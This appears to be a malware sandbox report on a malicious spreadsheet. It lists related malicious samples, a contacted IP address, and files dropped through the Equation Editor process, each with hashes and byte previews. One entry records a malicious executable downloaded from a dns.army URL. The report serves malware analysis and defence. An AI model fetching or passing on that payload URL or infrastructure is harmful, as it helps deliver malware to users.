                                                                                                                                                                                      Payment advice IN18663Q0031139I.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      NEW ORDER.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      Purchase Order SC_695853.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      Alexandra38.docxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      fileshare.docGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      documents-351331057.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      documents-1819557117.xlsmGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      IMAGE20210406_490133692.exe.exeGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      PRESUPUESTO.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      Documents_460000622_1464906353.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42
                                                                                                                                                                                      8e29685862fc0d569411c311852d3bb2da2eedb25fc9085a95020b17ddc073a9.xlsGet hashmaliciousBrowse
                                                                                                                                                                                      • 52.59.165.42

                                                                                                                                                                                      Dropped Files

                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exePurchase Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                        Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nsv1FD2.tmp\e4utfxiuc.dllPurchase Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                            eQLPRPErea.exeGet hashmaliciousBrowse
                                                                                                                                                                                              Quotation Zhejiang.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                C:\Users\Public\vbc.exePurchase Order.xlsxGet hashmaliciousBrowse
                                                                                                                                                                                                  Quotation Zhejiang.xlsxGet hashmaliciousBrowse

                                                                                                                                                                                                    Created / dropped Files

                                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:Microsoft Cabinet archive data, 58596 bytes, 1 file
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):58596
                                                                                                                                                                                                    Entropy (8bit):7.995478615012125
                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                    SSDEEP:1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
                                                                                                                                                                                                    MD5:61A03D15CF62612F50B74867090DBE79
                                                                                                                                                                                                    SHA1:15228F34067B4B107E917BEBAF17CC7C3C1280A8
                                                                                                                                                                                                    SHA-256:F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
                                                                                                                                                                                                    SHA-512:5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                                    Preview: MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>.*.V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..|0.+?.`-../.xvy..e......w.+^...w|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g|.z..+.D8.m..F .h...*.........ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.
                                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):893
                                                                                                                                                                                                    Entropy (8bit):7.366016576663508
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                                                                                                                                                                    MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                                                                                                                                                                    SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                                                                                                                                                                    SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                                                                                                                                                                    SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:high, very likely benign file
                                                                                                                                                                                                    Preview: 0..y..*.H.........j0..f...1.0...*.H.........N0..J0..2.......D....'..09...@k0...*.H........0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30...000930211219Z..210930140115Z0?1$0"..U....Digital Signature Trust Co.1.0...U....DST Root CA X30.."0...*.H.............0..........P..W..be......,k0.[...}.@......3vI*.?!I..N..>H.e...!.e.*.2....w..{........s.z..2..~..0....*8.y.1.P..e.Qc...a.Ka..Rk...K.(.H......>.... .[.*....p....%.tr.{j.4.0...h.{T....Z...=d.....Ap..r.&.8U9C....\@........%.......:..n.>..\..<.i....*.)W..=....]......B0@0...U.......0....0...U...........0...U.........{,q...K.u...`...0...*.H...............,...\...(f7:...?K.... ]..YD.>.>..K.t.....t..~.....K. D....}..j.....N..:.pI...........:^H...X._..Z.....Y..n......f3.Y[...sG.+..7H..VK....r2...D.SrmC.&H.Rg.X..gvqx...V..9$1....Z0G..P.......dc`........}...=2.e..|.Wv..(9..e...w.j..w.......)...55.1.
                                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):326
                                                                                                                                                                                                    Entropy (8bit):3.094144230589345
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6:kK5wTJ6YN+SkQlPlEGYRMY9z+4KlDA3RUe0ht:RwTJ6HkPlE99SNxAhUe0ht
                                                                                                                                                                                                    MD5:FC480F1A325280D2E3D46BB362B1A948
                                                                                                                                                                                                    SHA1:A98BF3BA9070287C607B4A11CA708BA297303354
                                                                                                                                                                                                    SHA-256:D9F18668A17D3CA5D98387FDE3997965DE341632166542723796F2A720402191
                                                                                                                                                                                                    SHA-512:3E9DE2E9A87E569B8A14A9CC90A9D550F66260385384A998E87A8C1E8A8847B138EA40409D7932BC8D57B3FA1EAF99888CF7A7C866E4AFF465AD2E9B49988BBC
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview: p...... ........0..../..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...
                                                                                                                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):252
                                                                                                                                                                                                    Entropy (8bit):2.9710739663159305
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:kkFklBFHlXfllXlE/jQEBllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1Ffl5nPM:kKIyQE1liBAIdQZV7ulPPN
                                                                                                                                                                                                    MD5:5E60109AD7B42E918233F1AA93E95A2C
                                                                                                                                                                                                    SHA1:1003616C4D6A42C72D5964A5988CCE1448B2ECBC
                                                                                                                                                                                                    SHA-256:63D02CE83706C273B0EB99FB17714CCFCBE60EBDFEBC23DB4F6D1A2C9AB4E896
                                                                                                                                                                                                    SHA-512:325D4856013EFB76D2E31E515CC117DE62C9A4A159D9B9FD4A0B95DBD9E6A24E29049C6B6D0B091D33BEA7A59D382F1DEBAEEE7DDB1A8E7C9F91CABD77867EE8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    Preview: p...... ....`...i.x../..(....................................................... .........|.j-......(...........}...h.t.t.p.:././.a.p.p.s...i.d.e.n.t.r.u.s.t...c.o.m./.r.o.o.t.s./.d.s.t.r.o.o.t.c.a.x.3...p.7.c...".3.7.d.-.5.b.f.8.d.f.8.0.6.2.7.0.0."...
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\winlog[1].exe
                                                                                                                                                                                                    Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                                    Size (bytes):206065
                                                                                                                                                                                                    Entropy (8bit):7.915089020780882
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3072:NeYBCwqDxkJ0KBUc2cZX//lia9uzqJ1FPe87cVroSCR58XxrviPv0NOtfptbRlP4:NDIKUc2SXli2LbG87uroXR585UcNKbbQ
                                                                                                                                                                                                    MD5:2C64897AA30694CC768F5EA375157932
                                                                                                                                                                                                    SHA1:C897F37780A5237D5C330BCF2668745201B38FF5
                                                                                                                                                                                                    SHA-256:18D465A5867EE069480BB9BE8EB259BE41CC008E487B7B6A3CAD14E3559963A9
                                                                                                                                                                                                    SHA-512:6C1CFC20E4AAF0EE78B60A80C5FF559CB71AC31B62F2E9068638046CD3FEC5FE078F37DE85C50C65090B82D784931E07BDF692A597B14133EAE36AD143B3FEA2
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Metadefender, Detection: 16%, Browse
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                                                    • Filename: Purchase Order.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                    • Filename: Quotation Zhejiang.xlsx, Detection: malicious, Browse
                                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                                    IE Cache URL:http://stdypmrimelimtewsosq.dns.army/documepnt/winlog.exe
                                                                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L.....8E.................\..........f1.......p....@.........................................................................Pt..........g............................................................................p...............................text....[.......\.................. ..`.rdata.......p.......`..............@..@.data....d...........r..............@....ndata...................................rsrc...g............v..............@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\12DBE4AC.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 577 x 201, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):9920
                                                                                                                                                                                                    Entropy (8bit):7.680823551882418
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Kcqdy0jT4tDZ3hwGFnIgvEGHEZsuMerPnuM3/g+BYKYp0:pq7jstthwyIJGxuprWso+BYKYp0
                                                                                                                                                                                                    MD5:5AF9F8C3DCDB3C155D4283AA797BA7C3
                                                                                                                                                                                                    SHA1:226BE2FD7230B34B060FC1C31F5C1A131D0BD01E
                                                                                                                                                                                                    SHA-256:29C1F433CDDCB4DE1179CC18182E5052BDE598F560C36FFEAB7975E9F193297C
                                                                                                                                                                                                    SHA-512:FF06FCAEB0F521A45B18356DE4230FFBAD7687A183229841017888D6FB97A971BBAF4C98AD7CD46B78D0E3169DF4630DEE2DC155BAB75B903D9C024B45D71A1A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR...A.........$x.1....sRGB.........gAMA......a.....pHYs..........+....&UIDATx^.M.V....B2....&tH.1.H...(.....:h..5.`$.h&.n.m}..d.u&.tP^......[...L#.@.t........cr....:.T.]U..:.....q..X..Z.vU.h..*.. ...@........1}Q...... ...8..A8.. ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\17154832.jpeg
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 396x275, frames 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):24075
                                                                                                                                                                                                    Entropy (8bit):6.730214296651396
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:oKr6BE4bXWRwgWHxVQ9T31pQO9v8IgLvt:oKcElRwfQ9T3cWiB
                                                                                                                                                                                                    MD5:09AFF1FCE05F6A872A9F9A75B7C645F5
                                                                                                                                                                                                    SHA1:5E8004FDCA739142B1AB20AD6BF773DE8C7B32FD
                                                                                                                                                                                                    SHA-256:00B28A518ACB867ABB2F0447DCEB07BD6E47005A1C608ACCF49A4EA3D96112F8
                                                                                                                                                                                                    SHA-512:355D944292FDCEC869EE28098B6CDF155EE7E697B3651F40538C34B68086DB370FF1D2B6C7306D71E4203734C73796EC6C9EE0C1F539E4F8F653575EE0FD66D9
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ......JFIF.....x.x......Exif..MM.*.......;.........J.i.........T.......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1FC8BBD1.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 1686 x 725, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):79394
                                                                                                                                                                                                    Entropy (8bit):7.864111100215953
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:ACLfq2zNFewyOGGG0QZ+6G0GGGLvjpP7OGGGeLEnf85dUGkm6COLZgf3BNUdQ:7PzbewyOGGGv+6G0GGG7jpP7OGGGeLEe
                                                                                                                                                                                                    MD5:16925690E9B366EA60B610F517789AF1
                                                                                                                                                                                                    SHA1:9F3FE15AE44644F9ED8C2CA668B7020DF726426B
                                                                                                                                                                                                    SHA-256:C3D7308B11E8C1EFD9C0A7F6EC370A13EC2C87123811865ED372435784579C1F
                                                                                                                                                                                                    SHA-512:AEF16EA5F33602233D60F6B6861980488FD252F14DCAE10A9A328338A6890B081D59DCBD9F5B68E93D394DEF2E71AD06937CE2711290E7DD410451A3B1E54CDD
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR................J....sRGB.........gAMA......a.....pHYs...t...t..f.x....IDATx^....~.y.....K...E...):.#.Ik..$o.....a.-[..S..M*A..Bc..i+..e...u["R.., (.b...IT.0X.}...(..@...F>...v....s.g.....x.>...9s..q]s......w...^z...........?........9D.}.w}W..RK..........S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z._....|.#..fF..?.G......zO.C.......zO.%......'....S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z....._.W.~....S.......c..zO.C..N.vO.%............S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z..&nf..?........zO.C...o...{J-......._..S..y....S.y....S.J_..qr.....I}|.._...>r.v~..G.*.)..#.>z...6..........J..:.......SjI..=...}.zO.#.%.vO.+...vO.+}.R...6.f.'..m.~m.~..=..5C.....4[....%uw........M.r..M.k.:N.q4[<..o..k...G......XE=..b$.G.,..K...H'._nj..kJ_..qr.....I}|.._...>r.v~..G.*.)..#.>......R...._..j.G...Y.>..!......O..{....L.}S..|.=}.>..OU...m.ks/....x..l....X.]e......?.........$...F.........>..{.Qb......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2C080710.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 577 x 201, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):9920
                                                                                                                                                                                                    Entropy (8bit):7.680823551882418
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:Kcqdy0jT4tDZ3hwGFnIgvEGHEZsuMerPnuM3/g+BYKYp0:pq7jstthwyIJGxuprWso+BYKYp0
                                                                                                                                                                                                    MD5:5AF9F8C3DCDB3C155D4283AA797BA7C3
                                                                                                                                                                                                    SHA1:226BE2FD7230B34B060FC1C31F5C1A131D0BD01E
                                                                                                                                                                                                    SHA-256:29C1F433CDDCB4DE1179CC18182E5052BDE598F560C36FFEAB7975E9F193297C
                                                                                                                                                                                                    SHA-512:FF06FCAEB0F521A45B18356DE4230FFBAD7687A183229841017888D6FB97A971BBAF4C98AD7CD46B78D0E3169DF4630DEE2DC155BAB75B903D9C024B45D71A1A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR...A.........$x.1....sRGB.........gAMA......a.....pHYs..........+....&UIDATx^.M.V....B2....&tH.1.H...(.....:h..5.`$.h&.n.m}..d.u&.tP^......[...L#.@.t........cr....:.T.]U..:.....q..X..Z.vU.h..*.. ...@........1}Q...... ...8..A8.. ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@...A... ...@...$@..I..4. ...@.
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2F0F20D4.emf
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1720
                                                                                                                                                                                                    Entropy (8bit):3.1255010354358324
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:YnnU9lGm0SR7VEyUHUDr7BmygdJIyy1q5shAG1zfHhRmZ/RQIRSvoRQ1R+WX:QWGUhEyUH07BdgdJIaYzfY0R
                                                                                                                                                                                                    MD5:0CF4DD6CE503FB21C4330589ACA40F90
                                                                                                                                                                                                    SHA1:CDB592106701AF938BC66E63118EB6A732A16CFE
                                                                                                                                                                                                    SHA-256:4F7393DB73D828D65388F6917FADDA48B8174EDA2EA02DF017CE3FE59A779205
                                                                                                                                                                                                    SHA-512:E5F38688D5E702121F2397FEF8FC6BCBDB92003B46B628E35AF3F3E3485836E0619F04224831BFBE8112C4CDCEB259C7BEE526A7E7EB652DD2D5BEF4E6417FF8
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ....l................................9.. EMF........ ...................V...........................fZ..U"..F...........GDIC........T.!.....j.........................................................................-.........!..................................................................................@..Calibri.a..WpP.......Iww@.zwU+fp....-.................2.................L.......2...............$.a.......2.$.........$...6.b.......2.6.........6...H.el........2.H.........H...Z.1l......'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?....................................................................................................R...p................................@..C.a.l.i.b.r.i.................................................................zw.......................................T....e]w......Yw(..X....pe]w.e]w.....U......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C8CCA5F.emf
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):3199944
                                                                                                                                                                                                    Entropy (8bit):1.0723286533222698
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:6144:5FPAuIU4U9tVvfJHGCOd7FPAuIU4U9tVvfJHGCOd2:5mIvhGJd7mIvhGJd2
                                                                                                                                                                                                    MD5:6CFA3170A68147326768DE26F5E88F3C
                                                                                                                                                                                                    SHA1:5ABCF9E540CFE7E9F1BB50F43FB139722402D141
                                                                                                                                                                                                    SHA-256:5EC13FDB116FAD2A722159AC55F98A857E0925759BCAEB75AC83FCCBF7C3E8C2
                                                                                                                                                                                                    SHA-512:5796C7D980E914485DD390F5EE14196EE89CCD7F6F237D4CA7AA88EC9158196E85FD7D5AC2990D9BA3DCCC55F63A8598F47B13020331F54134E931EF018C2A8B
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ....l................................H.. EMF......0.....................V...........................fZ..U"..F...ti..hi..GDIC........z.@m....Pi.........4.....4...........................................4..A. ...................(....................h................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9F8D22C5.emf
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):1824
                                                                                                                                                                                                    Entropy (8bit):3.1658052279472004
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:24:Y809I0tTPQu+BTx3oxtOD/0JIytKqBshAOuQfUhRmP/RQARSGRR86R+ku/Ro7:+gTx3oxtHI+IsKxf
                                                                                                                                                                                                    MD5:38A6926E2461FF5A90D2EB96CEC93E27
                                                                                                                                                                                                    SHA1:70D46A6E576D73A57FD03953A2F330639F185DFA
                                                                                                                                                                                                    SHA-256:27A7C418EC54589DA907E838EA4D23A9BE837E9C002717DA344CA978B0F65F3D
                                                                                                                                                                                                    SHA-512:939FF2FF6C9A22DFC2FC21F3804EA473DD61170A2A65450BF9A6AC23102383F84357D3DD5D14B63A8E132067535CBE5B6B0E9824EC87CA6628CE21D5203CC869
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: ....l...............................i;.. EMF.... ...!...................V...........................fZ..U"..F...........GDIC........jC.]..............................................................................-.........!..................................................................................@..Calibri.a..WpM.......Iww@.zw..f.....-.................2.................LL......2...............$.aL......2.$.........$...6.bL......2.6.........6...H.eL......2.H.........H...Z.lL......2.Z.........Z...l.2L......'.......................................................................................!.......'.......................%...........L...d...................................!..............?...........?....................................................................................................R...p................................@..C.a.l.i.b.r.i.................................................................zw........................X..............T....e]w......Yw(..X
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AED92384.png
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:PNG image data, 1268 x 540, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):51166
                                                                                                                                                                                                    Entropy (8bit):7.767050944061069
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:1536:zdKgAwKoL5H8LiLtoEdJ9OSbB7laAvRXDlBig49A:JDAQ9H8/GMSdhahg49A
                                                                                                                                                                                                    MD5:8C29CF033A1357A8DE6BF1FC4D0B2354
                                                                                                                                                                                                    SHA1:85B228BBC80DC60D40F4D3473E10B742E7B9039E
                                                                                                                                                                                                    SHA-256:E7B744F45621B40AC44F270A9D714312170762CA4A7DAF2BA78D5071300EF454
                                                                                                                                                                                                    SHA-512:F2431F3345AAB82CFCE2F96E1D54E53539964726F2E0DBC1724A836AD6281493291156AAD7CA263B829E4A1210A118E6FA791F198B869B4741CB47047A5E6D6A
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview: .PNG........IHDR.............q~.....sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^..;.,;.......d..........{...m.m....4...h..B.d...%x.?..{w.$#.Aff..?W.........x.(.......................^....{.......^j................................oP.C?@GGGGGGGGGG?@GGGGG.F}c.............E).....c._....w{}......e;.._ttttt.X..........C.....uOV.+..l...|?................@GGG?@GGG./...uK.WnM'.....s.s...`.........ttttt.:::..........:.z.{...'..=.......ttt..g.:::z......=......F..'..O..sLU..:nZ.DGGGGGGGGG.AGGGGGGGG.Y.....#~.......7,...................O..b.GZ..........].....].....]....]...CO.vX>......@GGGw/3.......tttt.2...s....n.U.!.....:.....:.....:....%...'..)w.....................>.{............<;...........^..z........./..=..........................~.]..q.t...AGGGGGGGGGG?@GGGGGGG...AA........................~..............z...^...\........._ttttt.X..........C....o.{.O.Y1........=....]^X......ttt..tttt.....f.%...............nAGGGG.....[.....=....b....?{.....=......
                                                                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B3BA968B.jpeg
                                                                                                                                                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                    File Type:[TIFF image data, big-endian, direntries=4], baseline, precision 8, 403x242, frames 3
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):22499
                                                                                                                                                                                                    Entropy (8bit):6.65776224633818
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:384:gtr6sgEVEVEVEVEV8uhjKs00xcg2g38THLMoYyz4g+xG:gtdgIIIII/KsLlr38Tu04gb
                                                                                                                                                                                                    MD5:37D204490B7E5C68D1CF8BA1D7BE31E4
                                                                                                                                                                                                    SHA1:F67D5AF4E5381CAB54973D69A8918E974280B795
